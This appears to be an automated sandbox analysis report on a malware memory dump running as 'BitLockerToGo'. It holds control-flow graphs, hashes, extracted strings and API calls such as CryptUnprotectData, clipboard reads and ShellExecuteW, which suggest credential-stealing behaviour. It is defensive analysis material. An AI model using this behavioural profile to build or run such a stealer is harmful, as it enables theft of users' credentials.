                                                                                                                                                                          • String ID: m->p= p->m=SCHED curg= ctxt: min= max= (...) base Format[]byte' for stringBasic CookiecookieexpectserverclosedmethodExpectPragma</a>.socks socks5CANCELGOAWAYPADDED, val numbernetdns.localreturn.onionip+netdomaingophertelnet390625uint16uint32uint64structch$ p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by %!(BADPREC)bad verb '%0123456789_http2serverhttp2cl$releasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptionfeature not supportedhttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandle$releasep: invalid p statecheckdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartunexpected key value typeExpandEnvironmentStringsWno hex dat$releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continuerecv_goaway_status code Multi-StatusNot ModifiedUnauthorizedI'm a te
                                                                                                                                                                          • API String ID: 0-3151324080
                                                                                                                                                                          • Opcode ID: 294ec51f8d2b2a921d4f22f713c438d926fbd704749ce1b05c4096db3cc1186e
                                                                                                                                                                          • Instruction ID: 1dca18459467e9cc5d88ddda612ff35af16ac3544d5e503edb84efa45045e316
                                                                                                                                                                          • Opcode Fuzzy Hash: 294ec51f8d2b2a921d4f22f713c438d926fbd704749ce1b05c4096db3cc1186e
                                                                                                                                                                          • Instruction Fuzzy Hash: B94102B4508745DFE310EF28D295B5ABBE4BF88324F01896DE4888B312D774D884DB62

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:36.1%
                                                                                                                                                                          Total number of Nodes:252
                                                                                                                                                                          Total number of Limit Nodes:23
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: a_$&N$(M$2AC$7M$MNOP$\%QZ$jXJ2$lL\J$tr${o}'$~ffv
• API String ID: 0-3686979115
• Opcode ID: 4611b88beb6ccb50771dc7916f51dade34d99978ba48bb579bdfeb48ba7b1672
• Instruction ID: 3656d1d5997a86bc1b36dec66e79683f19dbb65fa1b2c960236edae77f7af5b8
• Opcode Fuzzy Hash: 4611b88beb6ccb50771dc7916f51dade34d99978ba48bb579bdfeb48ba7b1672
• Instruction Fuzzy Hash: CF031670604B818BE7258F3584907A3BBE1AF5B305F1899AEC1EB4B383C77DA506CB55

Control-flow Graph

APIs
• SysAllocString.OLEAUT32(o1c3), ref: 0043DB66
• SysAllocString.OLEAUT32(135F1163), ref: 0043DC5F
• SysAllocString.OLEAUT32(o1c3), ref: 0043DCF6
• SysAllocString.OLEAUT32(135F1163), ref: 0043DDEF
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocString
• String ID: !$K5_7$S%U'$h=>?$n=Y?$o1c3$z9s;
• API String ID: 2525500382-3441675521
• Opcode ID: 5e3a75a4ddf47f3f25c6a00477788f6c1369728b9cc9b9551bac2f01f7343e3d
• Instruction ID: e375b97578b392eabe0a7dd7cc219a651d78669318e9ed7630db87dab6690228
• Opcode Fuzzy Hash: 5e3a75a4ddf47f3f25c6a00477788f6c1369728b9cc9b9551bac2f01f7343e3d
• Instruction Fuzzy Hash: 55710FB2E183109FD314CF65D88434BBBE6EFD9344F09D92DE985AB214C77889098B82

Control-flow Graph

561 43e40d-43e410 553->561 563 43e240-43e247 556->563 557->508 557->509 557->510 557->511 557->512 557->513 557->514 557->515 557->516 558->547 564 43e320-43e327 560->564 561->517 565 43e250-43e256 563->565 566 43e249-43e24c 563->566 567 43e3f3-43e3f9 564->567 568 43e32d-43e330 564->568 565->557 570 43e41a-43e449 call 4442c0 565->570 566->563 569 43e24e 566->569 567->561 572 43e3fb-43e40a call 4442c0 567->572 568->564 571 43e332 568->571 569->557 570->508 570->509 570->510 570->511 570->512 570->513 570->514 570->515 570->516 571->561 572->561
APIs
• VariantInit.OLEAUT32(?), ref: 0043DE73
• VariantClear.OLEAUT32(?), ref: 0043E01A
• SysFreeString.OLEAUT32 ref: 0043E035
• SysFreeString.OLEAUT32(?), ref: 0043E043
• SysFreeString.OLEAUT32(?), ref: 0043E054
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043E091
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: FreeString$Variant$ClearInformationInitVolume
• String ID: MNOP$ts
• API String ID: 1717694972-559354537
• Opcode ID: 54e60837902f482b477f2362dcacf9aa76a2d5e001c8c391ff905926b9de8589
• Instruction ID: 0cc59e07f5492757604fa8be6fdf46c9643aade133964c6e2580995c58aea401
• Opcode Fuzzy Hash: 54e60837902f482b477f2362dcacf9aa76a2d5e001c8c391ff905926b9de8589
• Instruction Fuzzy Hash: 43E11076A08300DFDB04CF69D881BAFB7A5FB89305F18882DE586972A1E778D905CB45

Control-flow Graph

control_flow_graph 577 40d740-40d74d call 442d70 580 40d952-40d954 ExitProcess 577->580 581 40d753-40d75f 577->581 582 40d760-40d772 581->582 582->582 583 40d774-40d827 582->583 584 40d830-40d842 583->584 584->584 585 40d844-40d849 584->585 586 40d91b-40d922 call 43acb0 585->586 587 40d84f-40d87e 585->587 593 40d924-40d932 GetCurrentThreadId GetInputState 586->593 594 40d94d call 4441e0 586->594 589 40d880-40d892 587->589 589->589 591 40d894-40d8b5 589->591 592 40d8c0-40d900 591->592 592->592 595 40d902-40d915 ShellExecuteW 592->595 596 40d934 GetCurrentProcessId 593->596 597 40d93a-40d941 call 40e9f0 593->597 594->580 595->586 596->597 597->594 601 40d943 call 411740 597->601 603 40d948 call 410300 601->603 603->594
APIs
• ShellExecuteW.SHELL32(00000000,?,0044B3DA,?,00000000,00000005), ref: 0040D915
• GetCurrentThreadId.KERNEL32 ref: 0040D924
• GetInputState.USER32 ref: 0040D92A
• GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D934
• ExitProcess.KERNEL32 ref: 0040D954
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: CurrentProcess$ExecuteExitInputShellStateThread
• String ID: XY
• API String ID: 288744916-554446067
• Opcode ID: 7026894f862dffd87aba4c6d55ee65ac830496e22894bc787cf636a69c118e3f
• Instruction ID: 465d4b7a2585bc09fb711781e3a3ae6e6e5e6265eec9b9c9a6ba7f1e9973c278
• Opcode Fuzzy Hash: 7026894f862dffd87aba4c6d55ee65ac830496e22894bc787cf636a69c118e3f
• Instruction Fuzzy Hash: C0515772A582114BD7089F74CC167AFBBD1DBD2718F089A3DD4C6EB291DA7C8C058785

Control-flow Graph

control_flow_graph 701 431c50-431ca2 call 40d030 704 431cb0-431cd5 701->704 704->704 705 431cd7-431d25 704->705 706 431d30-431d8d 705->706 706->706 707 431d8f-431eaa 706->707 708 431eb0-431ecc 707->708 708->708 709 431ece-431eda 708->709 710 431efb-431f03 709->710 711 431edc-431ee5 709->711 713 431f05-431f08 710->713 714 431f1d 710->714 712 431ef0-431ef9 711->712 712->710 712->712 715 431f10-431f19 713->715 716 431f1f-431f2b 714->716 715->715 717 431f1b 715->717 718 431f4b-431f53 716->718 719 431f2d-431f33 716->719 717->716 721 431f55-431f56 718->721 722 431f6b-431f77 718->722 720 431f40-431f49 719->720 720->718 720->720 723 431f60-431f69 721->723 724 431f8b-431f9f call 446bb0 722->724 725 431f79-431f7f 722->725 723->722 723->723 729 431fa6 724->729 730 431fab-431fb1 724->730 726 431f80-431f89 725->726 726->724 726->726 729->730 731 432181-43218b 730->731 732 431fb7-431fc6 730->732 733 432191-432199 731->733 734 431fdc-431fe0 732->734 735 4321ab-4321b9 call 4343c0 733->735 736 43219b-43219f 733->736 737 431fe2-431fed 734->737 738 431fd0 734->738 745 4321be-4321c4 735->745 740 4321a0-4321a9 736->740 742 432000-432006 737->742 743 431fef-431ff4 737->743 739 431fd1-431fda 738->739 739->734 744 432013-432029 call 40cf90 739->744 740->735 740->740 742->739 746 432008-432011 742->746 743->739 749 43202f-432036 744->749 750 43218d-43218f 744->750 745->729 745->730 746->739 751 432040-43204d 749->751 750->733 752 432060-432066 751->752 753 43204f-432057 751->753 755 4320b0-4320c1 752->755 756 432068-43206b 752->756 754 43208a 753->754 758 43208d-432093 754->758 759 432123-43212c 755->759 760 4320c3-4320c6 755->760 756->755 757 43206d-432087 756->757 757->754 763 432096-43209c 758->763 761 432139-43213f 759->761 762 43212e-432134 759->762 760->759 764 4320c8-43211e 760->764 765 432141-43216b 761->765 766 432170-432175 761->766 762->763 767 4320a2-4320a4 763->767 768 43217a-43217f 763->768 764->758 765->754 766->754 767->751 769 4320a6 767->769 768->733 769->768
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: -,#$KTPF$PLYY
• API String ID: 0-933768355
• Opcode ID: c830612fce113daf95d0515b4dadca89eb48f8cf62f5e216fbc303d1d643f3e5
• Instruction ID: 4b084376beab0e5d1c77c76ceee0ef197f343d228e61cd2838847b206eb42c2b
• Opcode Fuzzy Hash: c830612fce113daf95d0515b4dadca89eb48f8cf62f5e216fbc303d1d643f3e5
• Instruction Fuzzy Hash: 27E13870108B418BE7358F39C5A03A3BBE2EF9A310F188A6DC5EB0B386C7796505CB55

Control-flow Graph

control_flow_graph 770 40f6e0-40f717 771 40f720-40f74d 770->771 771->771 772 40f74f-40f855 771->772 773 40f860-40f893 772->773 773->773 774 40f895-40f8b7 773->774 775 40f8c0-40f8f9 774->775 775->775 776 40f8fb-40f914 call 410310 775->776 778 40f919-40f91e 776->778 779 40fa64-40fa66 778->779 780 40f924-40f93f 778->780 781 40fc09-40fc15 779->781 782 40f940-40f985 780->782 782->782 783 40f987-40f98f 782->783 784 40f990-40f99a 783->784 785 40f9a1-40f9a5 784->785 786 40f99c-40f99f 784->786 787 40fc00-40fc06 call 441240 785->787 788 40f9ab-40f9cf 785->788 786->784 786->785 787->781 790 40f9d0-40fa1b 788->790 790->790 792 40fa1d-40fa2a 790->792 793 40fa6b-40fa6f 792->793 794 40fa2c-40fa32 792->794 795 40fa75-40faa5 793->795 796 40fbfe 793->796 797 40fa47-40fa4b 794->797 799 40fab0-40fb0d 795->799 796->787 797->796 798 40fa51-40fa58 797->798 800 40fa5a-40fa5c 798->800 801 40fa5e 798->801 799->799 802 40fb0f-40fb18 799->802 800->801 803 40fa40-40fa45 801->803 804 40fa60-40fa62 801->804 805 40fb54-40fb56 802->805 806 40fb1a-40fb24 802->806 803->793 803->797 804->803 805->796 807 40fb5c-40fb6b 805->807 808 40fb37-40fb3b 806->808 809 40fb70-40fb92 807->809 808->796 810 40fb41-40fb48 808->810 809->809 811 40fb94-40fba0 809->811 812 40fb4a-40fb4c 810->812 813 40fb4e 810->813 816 40fbd0-40fbd2 811->816 817 40fba2-40fbae 811->817 812->813 814 40fb30-40fb35 813->814 815 40fb50-40fb52 813->815 814->805 814->808 815->814 819 40fbdc-40fbfc call 40f460 816->819 818 40fbb7-40fbbb 817->818 818->796 820 40fbbd-40fbc4 818->820 819->787 823 40fbc6-40fbc8 820->823 824 40fbca 820->824 823->824 825 40fbb0-40fbb5 824->825 826 40fbcc-40fbce 824->826 825->818 827 40fbd4-40fbda 825->827 826->825 827->796 827->819
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 4Ho$>)67$|
• API String ID: 0-954626911
• Opcode ID: d96bc924c7f09152f10dcaaffdd2465935632d14aa74084ae514f16a4ff0fba9
• Instruction ID: a49d84cc3b78b00a8920eaac330edcf7beaceddc11f8ddb3ed92fa907981174f
• Opcode Fuzzy Hash: d96bc924c7f09152f10dcaaffdd2465935632d14aa74084ae514f16a4ff0fba9
• Instruction Fuzzy Hash: 19D1297264C3904BD324CF2484913ABFBE2ABD1714F18C93DE8D95B785D6799C0E8B86

Control-flow Graph

control_flow_graph 838 40fdcc-40fdd1 839 410033-4100cd call 40cf90 838->839 840 4100e2-4100eb 838->840 841 4100f2-4100f9 838->841 842 4100d4-4100dd 838->842 843 40fdd8-40fdda 838->843 844 4101a9-4101b5 838->844 845 4100fb-410115 838->845 846 41002a-41002e 838->846 847 40fddf-40ffc8 838->847 839->840 839->841 839->842 839->844 839->845 849 4101ba-4101e3 839->849 840->841 840->844 840->845 840->849 850 41014a-41016f 841->850 848 4102d3-4102da 842->848 852 4102ec-4102f3 843->852 856 4102ca 844->856 851 410120-410143 845->851 854 4102dd-4102e9 846->854 853 40ffd0-41000d 847->853 848->854 864 4102c1 849->864 865 4102b0 849->865 866 4102b2 849->866 867 410245-410252 call 444200 849->867 868 4102b9 849->868 869 41029b-4102a9 849->869 870 4101ea-410205 849->870 871 41026a-410299 849->871 872 41020c-410224 849->872 873 4102be 849->873 858 410170-410189 850->858 851->851 857 410145-410147 851->857 853->853 859 41000f-410017 853->859 854->852 856->848 857->850 858->858 863 41018b-4101a2 858->863 875 41001a-410023 859->875 863->844 863->849 864->856 866->868 880 410257-410263 867->880 868->873 869->865 870->864 870->865 870->866 870->867 870->868 870->869 870->871 870->872 870->873 871->865 879 41022d-41023e 872->879 873->864 875->839 875->840 875->841 875->842 875->844 875->845 875->846 875->849 879->865 879->866 879->867 879->868 879->869 879->871 879->873 880->865 880->866 880->868 880->869 880->871 880->873
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: TeBc$eYTg
• API String ID: 0-1520256206
• Opcode ID: 32695e0db0345247e68cbe9b8b32f82eb5ce7c3f205a617f9132e5ce00805434
• Instruction ID: e6afab19e6d45f0cdd9358ecf5c9068d7ae2c4db10355e1d3b0525c8a52db234
• Opcode Fuzzy Hash: 32695e0db0345247e68cbe9b8b32f82eb5ce7c3f205a617f9132e5ce00805434
• Instruction Fuzzy Hash: 9AE179B5201701CFD3248F25D884756BBB2FB49318F2889ADD45A8F7A2CB76E847CB54

Control-flow Graph

control_flow_graph 911 410310-41056f 912 410570-41059a 911->912 912->912 913 41059c-4105ad 912->913 914 4105b0-4105ce 913->914
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 2W[F$>>
• API String ID: 0-892849328
• Opcode ID: c0d4ce0fed8bd8708f299d1196397565a226412dcdfafdc05830167a4d9ece94
• Instruction ID: 7ecc30d320eb1d122996a0197f2796ef880947f6805e3d8819134336918cb3b1
• Opcode Fuzzy Hash: c0d4ce0fed8bd8708f299d1196397565a226412dcdfafdc05830167a4d9ece94
• Instruction Fuzzy Hash: 0F513EF09013699BEB76CF42AC8078EBA79AB41384F1096DCD2583B245CB744BC5CF88

Control-flow Graph: basic-block graph of the function at 41f5cb, which calls CryptUnprotectData

Similarity
• API ID:
• String ID:
Strings
Similarity
• API ID: InitializeThunk
• String ID: MNOP
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00444275
Similarity
• API ID: AllocateHeap
• String ID:
APIs
• CoCreateInstance.OLE32(0044AB30,00000000,00000001,0044AB20,00000000), ref: 0043D9DA
Similarity
• API ID: CreateInstance
• String ID:
APIs
• LdrInitializeThunk.NTDLL(0044781A,005C003F,00000006,?,?,00000018,?,?,?), ref: 004442EE
Similarity
• API ID: InitializeThunk
• String ID:
Similarity
• API ID:
• String ID:
Similarity
• API ID: InitializeThunk
• String ID:
Similarity
• API ID:
• String ID:
Similarity
• API ID:
• String ID:

Control-flow Graph: basic-block graph of the function at 441240, which calls RtlFreeHeap

APIs
• RtlFreeHeap.NTDLL(?,00000000,?), ref: 004412D5
Strings
Similarity
• API ID: FreeHeap
• String ID: ~ORr

APIs
• GetForegroundWindow.USER32 ref: 00444FB4
• GetForegroundWindow.USER32 ref: 00444FD0
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
APIs
• SysAllocString.OLEAUT32(01D707D6), ref: 0043DA94
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 0044122D
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411773
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
APIs
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043DAD6
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• CoInitialize.OLE32(00000000), ref: 00411751
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $%fs!$()&'$22.h$45$8967$9:;4$@`Sr$MNOH$OP[9$Q[EV$cHo|$ijkd$lCax$nvwp$s.!1$x$yz{{$|
• API String ID: 0-1735489010
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
• API String ID: 0-3131871939
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: PW$Y|$wr
• API String ID: 0-2263561277
                                                                                                                                                                          • Opcode ID: 6d99af540e4abc2612ea7af0babd86b67eba03daaf8d0dec55b00adec6f609bb
                                                                                                                                                                          • Instruction ID: 836e795dc3a6a6951465090a0755d9f24f51ce8379c934f2512c7f5bdaf57535
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d99af540e4abc2612ea7af0babd86b67eba03daaf8d0dec55b00adec6f609bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 6012BEB5609391CBC324CF29D8512ABBBE1FFD5314F148A2DE4D98B390E7389941CB86
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1647500905-0
                                                                                                                                                                          • Opcode ID: 382aa81443e1c6d37f1c81bea4e41c4af0190f2b80d24c27bdab5bd6368e22b9
                                                                                                                                                                          • Instruction ID: 5b89dc6d59e55e3a6ce5feea3654ac742ab26a8dce0357985b57151cb4c0cb17
                                                                                                                                                                          • Opcode Fuzzy Hash: 382aa81443e1c6d37f1c81bea4e41c4af0190f2b80d24c27bdab5bd6368e22b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 6451B6B1D087468FDB00ABBC94453AEFFB09B16320F14467EF4A1962C1D6389646C797
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: *$2B$<=$LP
                                                                                                                                                                          • API String ID: 0-162656369
                                                                                                                                                                          • Opcode ID: bba36f24c102c591de2bffe78ed3c7827764e049e7a281ab1cb89b4d76fdc406
                                                                                                                                                                          • Instruction ID: bdb2b4ff058e132cd50c61e93f34de9b76f6ead3cd9f4328d69b624b3b7e3af3
                                                                                                                                                                          • Opcode Fuzzy Hash: bba36f24c102c591de2bffe78ed3c7827764e049e7a281ab1cb89b4d76fdc406
                                                                                                                                                                          • Instruction Fuzzy Hash: FDA1EDB2A083419BE310DF21E84025BBBE2FFC6354F54892DE4C59B351E7788949CB87
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$MNOP$RlD$bpD$koD$rlD
                                                                                                                                                                          • API String ID: 0-406179893
                                                                                                                                                                          • Opcode ID: 6a210df2170431f10f028ff0b25c52225aa814bdfac35bdaf061c6ccc0928756
                                                                                                                                                                          • Instruction ID: 2ad0054f88d0a31c720170a2ac0a191b5e12152168221190a788aedced7b7e39
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a210df2170431f10f028ff0b25c52225aa814bdfac35bdaf061c6ccc0928756
                                                                                                                                                                          • Instruction Fuzzy Hash: 25521276B08311CFD708CF28D8A026AB7E2FB8A315F1A847ED48697352D774D946CB85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$MNOP$RlD$bpD$koD$rlD
                                                                                                                                                                          • API String ID: 0-406179893
                                                                                                                                                                          • Opcode ID: 3afd024c09c8f4e3f9e038fed5b0680b3e0905bc20750ea30bb0639aa7960774
                                                                                                                                                                          • Instruction ID: 0d3c0a34b0c7f2bda6b9c2ad40935ae2538b764a9e03d8a77062fe5cf5224ad0
                                                                                                                                                                          • Opcode Fuzzy Hash: 3afd024c09c8f4e3f9e038fed5b0680b3e0905bc20750ea30bb0639aa7960774
                                                                                                                                                                          • Instruction Fuzzy Hash: 7422FD36B08311CFC708CF68E99026AB7E2FB8A315F1A857ED48597762D374E845CB85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$MNOP$RlD$bpD$koD$rlD
                                                                                                                                                                          • API String ID: 0-406179893
                                                                                                                                                                          • Opcode ID: 8a1a26636fe8f9ae544f2c1992a448c6edbea5a4b0a5ed36d256c72b1e818340
                                                                                                                                                                          • Instruction ID: 18aecb7f58442ab272fd49af5572027e24a4e6bffacdaf05d7047bf41a402aad
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a1a26636fe8f9ae544f2c1992a448c6edbea5a4b0a5ed36d256c72b1e818340
                                                                                                                                                                          • Instruction Fuzzy Hash: 5312F136708311CFD708CF28E89026AB7E2FB8A315F1A857ED485973A2D774D946CB85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4$>G$cae`$sfoj$uawh$~ug}
                                                                                                                                                                          • API String ID: 0-40103800
                                                                                                                                                                          • Opcode ID: 1b1787792d23b21b9764f4874d6a9d439f714137f28e82940ea40a2f43e097be
                                                                                                                                                                          • Instruction ID: 0eed4f4956e7e88e46ad646ad5d3584da1fc03cd4ccb8ef5a45b1f39504a9e9b
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b1787792d23b21b9764f4874d6a9d439f714137f28e82940ea40a2f43e097be
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E61017154C3818BD3118F69C49036BFFE1AFA2340F184AADE8C45B392D7798909CB9B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP$WS$Z[$iW
                                                                                                                                                                          • API String ID: 0-2174644700
                                                                                                                                                                          • Opcode ID: ddec0c380ac517acfa482a69a21ea75a9b3f7248e8c135a75b7ab8a1ee6ed357
                                                                                                                                                                          • Instruction ID: 2e841e770ded7ddd37e7e8edceb96449d2e0203d08f27b8edcd6fcbf8cd919ff
